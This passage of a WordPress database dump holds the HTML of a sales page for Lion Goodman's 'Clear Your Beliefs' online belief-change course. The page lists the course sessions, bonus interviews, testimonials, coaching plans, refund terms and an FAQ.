alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?\r\n\r\nIn this interview, Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.  </em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\nCarista shares her latest research on childhood attachment, and how our early bonding patterns with our parents play out again and again in our adult relationships.  We’re confused about what love is, and how to love. We can’t seem to stop hurting each other. The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) attachment style, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll get practical techniques for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 19:54:31', '2014-06-18 00:54:31', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(977, 2, '2014-06-17 18:54:53', '2014-06-17 23:54:53', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span 